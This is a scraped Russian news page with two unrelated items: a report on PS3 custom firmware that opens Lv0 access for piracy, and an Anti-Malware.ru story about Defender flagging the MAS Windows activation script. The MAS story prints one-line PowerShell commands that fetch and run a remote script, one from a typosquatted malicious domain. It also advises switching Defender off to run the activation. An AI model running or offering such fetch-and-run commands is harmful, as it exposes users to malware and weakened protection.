Lv0-защита Sony PlayStation 3 была взломана хакерами

Хакеры полностью взломали защиту Sony PlayStation 3

В сети была выложена новая прошивка для игровой приставки PlayStation 3. Данная пользовательская версия основана на базе официального релиза 4.25. Главная особенность новой хакерской прошивки заключается в том, что она открывает в системе доступ к Lv0-защите.



Доступ к Lv0 предоставляет открыть один из самых защищенных слоев PS3, который Sony тщетно пыталась прикрыть долгое время. Для производителя этой платформы, такие новости не могут означать ничего хорошего: пиратство на системе может вспыхнуть с новой силой.

Согласно новейшим комментариям от пользователей, новый взлом позволяет выходить в сетевой сервис PSN, впрочем, мы думаем, что Sony в скором времени начнет блокировать вылазки со взломанных систем. Тем не менее, для компании подобный взлом означает очередной скандал с системой защиты, ведь новая прошивка открывает еще больше возможностей по запуску пиратских копий видеоигр.

Фотография новейшей версии PlayStation 3.


Проблема в том, что хакеры преодолели самую низкоуровневую защиту, так что все последующие обновления для приставки могут быть разблокированы практически без усилий. Есть предположение, что о данном взломе знали уже достаточно долго, но его не хотели выкладывать в широком доступе, дабы не гневить Sony. Однако появилась группа, пожелавшая использовать данную информацию для коммерческого обогащения: они хотели продавать новую прошивку пользователям. Из-за этого Lv0-доступ открыли для широкой общественности столь стремительно.

PlayStation 3 – одна из самых хорошо защищенных игровых приставок текущего поколения. Система от Sony противостояла хакерским взломам долгие годы, но в итоге систему все-таки взломали. Установка на приставку новых прошивок позволила запускать на ней копии нелегальных игр, записанных на внутренний жесткий диск, а также работать с пользовательскими программами. Не уточняется, как взлом отразился на продажах игровых продуктов, однако можно точно сказать, что хакерская активность переместилась с PlayStation 3 на сетевой сервис PlayStation Network.

Весной 2011 хакеры взломали PlayStation Network и получили доступ к огромному количеству пользовательских данных. Это вызвало несколько коллективных судебных исков в адрес Sony. Только на этой неделе американский окружной судья Энтони Баттадлиа отклонил многочисленные претензии клиентов к компании, которую признали невиновной во взломе.

выложена новая прошивка для игровой приставки PlayStation 3. Данная пользовательская версия основана на базе официального релиза 4.25. Главная особенность новой хакерской прошивки заключается в том, что она открывает в системе доступ к Lv0-защите.

" />

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru